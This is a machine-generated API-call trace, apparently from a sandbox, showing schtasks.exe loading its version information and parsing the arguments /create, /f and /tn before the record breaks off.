[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f4ff0
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5010
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5030
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4be8
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5050
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5070
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5090
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f50b0
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c00
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f50d0
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f50f0
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5128
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5148
[0170.361] SetThreadUILanguage (LangId=0x0) returned 0x409
[0170.362] SetLastError (dwErrCode=0x0)
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5168
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5188
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f51a8
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f51c8
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f51e8
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c18
[0170.362] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x208) returned 0x4f5a90
[0170.362] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f5a90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0170.363] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x733a0000
[0170.365] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x733a19d9
[0170.365] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0170.365] GetProcessHeap () returned 0x4e0000
[0170.365] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x74e) returned 0x4f5ca0
[0170.366] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoW") returned 0x733a19f4
[0170.366] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x4f5ca0 | out: lpData=0x4f5ca0) returned 1
[0170.366] GetProcAddress (hModule=0x733a0000, lpProcName="VerQueryValueW") returned 0x733a1b51
[0170.366] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13f958, puLen=0x13f95c | out: lplpBuffer=0x13f958*=0x4f603c, puLen=0x13f95c) returned 1
[0170.371] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.371] _vsnwprintf (in: _Buffer=0x4f5a90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x13f940 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0170.371] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x13f968, puLen=0x13f964 | out: lplpBuffer=0x13f968*=0x4f5e68, puLen=0x13f964) returned 1
[0170.371] lstrlenW (lpString="schtasks.exe") returned 12
[0170.372] lstrlenW (lpString="schtasks.exe") returned 12
[0170.372] lstrlenW (lpString=".EXE") returned 4
[0170.372] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0170.372] lstrlenW (lpString="schtasks.exe") returned 12
[0170.372] lstrlenW (lpString=".EXE") returned 4
[0170.372] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.372] lstrlenW (lpString="schtasks") returned 8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5228
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5248
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5268
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5288
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c78
[0170.373] _memicmp (_Buf1=0x4f4c78, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xa0) returned 0x4f6680
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f52a8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f52c8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f52e8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.374] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c90
[0170.374] _memicmp (_Buf1=0x4f4c90, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x200) returned 0x4f6728
[0170.374] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4f6728, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0170.374] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x30) returned 0x4f6930
[0170.374] _vsnwprintf (in: _Buffer=0x4f6680, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x13f944 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0) returned 1
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5ca0) returned 0x74e
[0170.375] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0 | out: hHeap=0x4e0000) returned 1
[0170.375] SetLastError (dwErrCode=0x0)
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="?") returned 1
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="create") returned 6
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="delete") returned 6
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="query") returned 5
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="change") returned 6
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="run") returned 3
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="end") returned 3
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="showsid") returned 7
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] SetLastError (dwErrCode=0x0)
[0170.376] SetLastError (dwErrCode=0x0)
[0170.376] lstrlenW (lpString="/create") returned 7
[0170.376] lstrlenW (lpString="-/") returned 2
[0170.376] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.376] lstrlenW (lpString="?") returned 1
[0170.377] lstrlenW (lpString="?") returned 1
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4ca8
[0170.377] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xa) returned 0x4f4cc0
[0170.377] lstrlenW (lpString="create") returned 6
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4cd8
[0170.377] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5308
[0170.377] _vsnwprintf (in: _Buffer=0x4f4cc0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.377] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.377] lstrlenW (lpString="|?|") returned 3
[0170.377] lstrlenW (lpString="|create|") returned 8
[0170.377] SetLastError (dwErrCode=0x490)
[0170.377] lstrlenW (lpString="create") returned 6
[0170.377] lstrlenW (lpString="create") returned 6
[0170.377] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.378] GetProcessHeap () returned 0x4e0000
[0170.378] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cc0) returned 1
[0170.378] GetProcessHeap () returned 0x4e0000
[0170.378] RtlReAllocateHeap (Heap=0x4e0000, Flags=0xc, Ptr=0x4f4cc0, Size=0x14) returned 0x4f5328
[0170.378] lstrlenW (lpString="create") returned 6
[0170.378] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.378] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.378] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.378] lstrlenW (lpString="|create|") returned 8
[0170.378] lstrlenW (lpString="|create|") returned 8
[0170.378] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0170.378] SetLastError (dwErrCode=0x0)
[0170.378] SetLastError (dwErrCode=0x0)
[0170.378] SetLastError (dwErrCode=0x0)
[0170.378] lstrlenW (lpString="/f") returned 2
[0170.378] lstrlenW (lpString="-/") returned 2
[0170.378] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.378] lstrlenW (lpString="?") returned 1
[0170.378] lstrlenW (lpString="?") returned 1
[0170.378] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] lstrlenW (lpString="f") returned 1
[0170.379] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.379] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.379] lstrlenW (lpString="|?|") returned 3
[0170.379] lstrlenW (lpString="|f|") returned 3
[0170.379] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0170.379] SetLastError (dwErrCode=0x490)
[0170.379] lstrlenW (lpString="create") returned 6
[0170.379] lstrlenW (lpString="create") returned 6
[0170.379] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] lstrlenW (lpString="f") returned 1
[0170.379] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.379] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.379] lstrlenW (lpString="|create|") returned 8
[0170.379] lstrlenW (lpString="|f|") returned 3
[0170.379] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0170.379] SetLastError (dwErrCode=0x490)
[0170.379] lstrlenW (lpString="delete") returned 6
[0170.379] lstrlenW (lpString="delete") returned 6
[0170.379] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] lstrlenW (lpString="f") returned 1
[0170.380] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|delete|") returned 8
[0170.380] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.380] lstrlenW (lpString="|delete|") returned 8
[0170.380] lstrlenW (lpString="|f|") returned 3
[0170.380] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0170.380] SetLastError (dwErrCode=0x490)
[0170.380] lstrlenW (lpString="query") returned 5
[0170.380] lstrlenW (lpString="query") returned 5
[0170.380] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] lstrlenW (lpString="f") returned 1
[0170.380] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|query|") returned 7
[0170.380] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.380] lstrlenW (lpString="|query|") returned 7
[0170.380] lstrlenW (lpString="|f|") returned 3
[0170.380] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0170.380] SetLastError (dwErrCode=0x490)
[0170.380] lstrlenW (lpString="change") returned 6
[0170.380] lstrlenW (lpString="change") returned 6
[0170.380] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] lstrlenW (lpString="f") returned 1
[0170.380] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|change|") returned 8
[0170.381] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.381] lstrlenW (lpString="|change|") returned 8
[0170.381] lstrlenW (lpString="|f|") returned 3
[0170.381] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0170.381] SetLastError (dwErrCode=0x490)
[0170.381] lstrlenW (lpString="run") returned 3
[0170.381] lstrlenW (lpString="run") returned 3
[0170.381] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] lstrlenW (lpString="f") returned 1
[0170.381] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|run|") returned 5
[0170.381] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.381] lstrlenW (lpString="|run|") returned 5
[0170.381] lstrlenW (lpString="|f|") returned 3
[0170.381] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0170.381] SetLastError (dwErrCode=0x490)
[0170.381] lstrlenW (lpString="end") returned 3
[0170.381] lstrlenW (lpString="end") returned 3
[0170.381] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] lstrlenW (lpString="f") returned 1
[0170.381] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|end|") returned 5
[0170.381] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.381] lstrlenW (lpString="|end|") returned 5
[0170.381] lstrlenW (lpString="|f|") returned 3
[0170.381] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] lstrlenW (lpString="showsid") returned 7
[0170.382] lstrlenW (lpString="showsid") returned 7
[0170.382] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5328) returned 1
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] RtlReAllocateHeap (Heap=0x4e0000, Flags=0xc, Ptr=0x4f5328, Size=0x16) returned 0x4f5348
[0170.382] lstrlenW (lpString="f") returned 1
[0170.382] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.382] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|showsid|") returned 9
[0170.382] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.382] lstrlenW (lpString="|showsid|") returned 9
[0170.382] lstrlenW (lpString="|f|") returned 3
[0170.382] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] SetLastError (dwErrCode=0x0)
[0170.382] lstrlenW (lpString="/f") returned 2
[0170.382] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] SetLastError (dwErrCode=0x0)
[0170.382] lstrlenW (lpString="/f") returned 2
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x6) returned 0x4f6968
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5328
[0170.383] SetLastError (dwErrCode=0x0)
[0170.383] SetLastError (dwErrCode=0x0)
[0170.383] lstrlenW (lpString="/tn") returned 3
[0170.383] lstrlenW (lpString="-/") returned 2
[0170.383] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.383] lstrlenW (lpString="?") returned 1
[0170.383] lstrlenW (lpString="?") returned 1
[0170.383] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] lstrlenW (lpString="tn") returned 2
[0170.383] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.383] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.383] lstrlenW (lpString="|?|") returned 3
[0170.383] lstrlenW (lpString="|tn|") returned 4
[0170.383] SetLastError (dwErrCode=0x490)
[0170.383] lstrlenW (lpString="create") returned 6
[0170.383] lstrlenW (lpString="create") returned 6
[0170.383] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] lstrlenW (lpString="tn") returned 2
[0170.383] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.383] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.383] lstrlenW (lpString="|create|") returned 8
[0170.383] lstrlenW (lpString="|tn|") returned 4
[0170.383] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0170.383] SetLastError (dwErrCode=0x490)
[0170.383] lstrlenW (lpString="delete") returned 6
[0170.383] lstrlenW (lpString="delete") returned 6
[0170.383] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] lstrlenW (lpString="tn") returned 2
[0170.384] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|delete|") returned 8
[0170.384] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.384] lstrlenW (lpString="|delete|") returned 8
[0170.384] lstrlenW (lpString="|tn|") returned 4
[0170.384] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0170.384] SetLastError (dwErrCode=0x490)
[0170.384] lstrlenW (lpString="query") returned 5
[0170.384] lstrlenW (lpString="query") returned 5
[0170.384] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] lstrlenW (lpString="tn") returned 2
[0170.384] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|query|") returned 7
[0170.384] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.384] lstrlenW (lpString="|query|") returned 7
[0170.384] lstrlenW (lpString="|tn|") returned 4
[0170.384] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0
[0170.384] SetLastError (dwErrCode=0x490)
[0170.384] lstrlenW (lpString="change") returned 6
[0170.384] lstrlenW (lpString="change") returned 6
[0170.384] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] lstrlenW (lpString="tn") returned 2
[0170.384] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|change|") returned 8
[0170.385] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.385] lstrlenW (lpString="|change|") returned 8
[0170.385] lstrlenW (lpString="|tn|") returned 4
[0170.385] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0
[0170.385] SetLastError (dwErrCode=0x490)
[0170.385] lstrlenW (lpString="run") returned 3
[0170.385] lstrlenW (lpString="run") returned 3
[0170.385] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] lstrlenW (lpString="tn") returned 2
[0170.385] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|run|") returned 5
[0170.385] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.385] lstrlenW (lpString="|run|") returned 5
[0170.385] lstrlenW (lpString="|tn|") returned 4
[0170.385] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0
[0170.385] SetLastError (dwErrCode=0x490)
[0170.385] lstrlenW (lpString="end") returned 3
[0170.385] lstrlenW (lpString="end") returned 3
[0170.385] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] lstrlenW (lpString="tn") returned 2
[0170.385] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|end|") returned 5
[0170.385] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.385] lstrlenW (lpString="|end|") returned 5
[0170.385] lstrlenW (lpString="|tn|") returned 4
[0170.385] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0
[0170.385] SetLastError (dwErrCode=0x490)
[0170.385] lstrlenW (lpString="showsid") returned 7
[0170.386] lstrlenW (lpString="showsid") returned 7
